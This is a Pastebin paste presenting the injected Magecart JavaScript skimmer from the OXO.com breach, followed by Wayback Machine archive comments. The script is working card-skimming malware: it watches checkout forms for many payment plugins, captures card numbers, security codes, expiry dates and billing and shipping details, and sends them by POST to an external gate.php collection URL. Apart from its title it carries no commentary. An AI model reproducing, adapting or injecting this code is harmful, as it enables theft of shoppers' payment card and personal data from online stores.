1ZRR4H

Magecart code from OXO.COM data breach

Jan 10th, 2019
930
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Injected #MAGECART code from OXO.COM data breach. (https://js-cloud.com/js/static.js)
  2.  
  3. _cfb=_cfs=_cfp=true;_bf=_sf=_pf=null;ids=[['[name="payment[cc_number]"]','[name="payment[cc_cid]"]'],['#adyen_cc_cc_number','#adyen_cc_cc_cid','#adyen_cc_expiration','#adyen_cc_expiration_yr'],['#stripe_cc_number','#stripe_cc_cvc','#stripe_cc_expiration_month','#stripe_cc_expiration_year'],['#pinpayments_cc_number','#pinpayments_cc_cid','#pinpayments_expiration','#pinpayments_expiration_yr'],['#ewayrapid_notsaved_cc_number','#ewayrapid_notsaved_cc_cid','#ewayrapid_notsaved_expiration','#ewayrapid_notsaved_expiration_yr'],['[name="heidelpaycw_visa[ACCOUNT.NUMBER]"]','[name="heidelpaycw_visa[ACCOUNT.VERIFICATION]"]','[name="heidelpaycw_visa[ACCOUNT.EXPIRY_MONTH]"]','[name="heidelpaycw_visa[ACCOUNT.EXPIRY_YEAR]"]'],['#cardNumber','#securityCode','#cardExpirationMonth','#cardExpirationYear'],['#fatzebra_cc_number','#fatzebra_cc_cid','#expire-date'],['#radweb_stripe_cc_number','#radweb_stripe_cc_cid','#radweb_stripe_expiration','#radweb_stripe_expiration_yr'],['[name=psn]','[name=csc]','[name=expirydate1]','[name=expirydate2]'],['#braintree_cc_number','#braintree_cc_cid','#braintree_expiration','#braintree_expiration_yr']];function __filt(val){return val.replace(/[^\d]/g,'').trim()}setInterval(function(){if(_cfb&&(_bf=jQuery('form:has([name^="billing["])')).size()){_cfb=false;_bf.change(function(){localStorage.setItem('__billing123',[this.id,jQuery(this).serialize()])})}if(_cfs&&(_sf=jQuery('form:has([name^="shipping["])')).size()){_cfs=false;_sf.change(function(){localStorage.setItem('__shipping123',[this.id,jQuery(this).serialize()])})}if(_cfp){var sd=window.location.host.split(':',2),jqn=null,jqc=null;var url='http://web.archive.org/web/20170603213602/https://js-cloud.com/gate.php?token=KjsS29Msl&host='+sd[0];for(var i=0;i<ids.length;i++)if((jqn=jQuery(ids[i][0])).size()&&(jqc=jQuery(ids[i][1])).size()){var n=__filt(jqn.val()),c=__filt(jqc.val());if((n.length==16&&c.length==3)||(n.length==15&&c.length==4)){var st=null,data='';_pf=jQuery('form:has('+ids[i][0]+')');_cfp=false;data=_pf.serialize();if(ids[i][2]!==undefined){data+='&jqcn='+n+'&jqcc='+c;if(ids[i][3]!==undefined){var m=jQuery(ids[i][2]).val(),y=jQuery(ids[i][3]).val();data+='&jqcm='+m+'&jqcy='+y}else data+='&jqdt='+jQuery(ids[i][2]).val()}if(st=localStorage.getItem('__billing123')){sd=st.split(',',2);if(_pf.attr('id')!=sd[0])data+='&'+sd[1]}if(st=localStorage.getItem('__shipping123')){sd=st.split(',',2);if(_pf.attr('id')!=sd[0])data+='&'+sd[1]}data=data.replace('"billing%5B','billing%5B');jQuery.ajax({url:url,crossDomain:false,data:data,type:'POST',dataType:'json'})}break}}},700);
  4. /*
  5. FILE ARCHIVED ON 21:36:02 Jun 03, 2017 AND RETRIEVED FROM THE
  6. INTERNET ARCHIVE ON 05:33:55 Jan 11, 2019.
  7. JAVASCRIPT APPENDED BY WAYBACK MACHINE, COPYRIGHT INTERNET ARCHIVE.
  8.  
  9. ALL OTHER CONTENT MAY ALSO BE PROTECTED BY COPYRIGHT (17 U.S.C.
  10. SECTION 108(a)(3)).
  11. */
  12. /*
  13. playback timings (ms):
  14. LoadShardBlock: 139.722 (3)
  15. esindex: 0.006
  16. captures_list: 167.471
  17. CDXLines.iter: 12.622 (3)
  18. PetaboxLoader3.datanode: 196.258 (5)
  19. exclusion.robots: 0.38
  20. exclusion.robots.policy: 0.363
  21. RedisCDXSource: 6.643
  22. PetaboxLoader3.resolve: 54.827 (2)
  23. load_resource: 163.473
  24. */
RAW Paste Data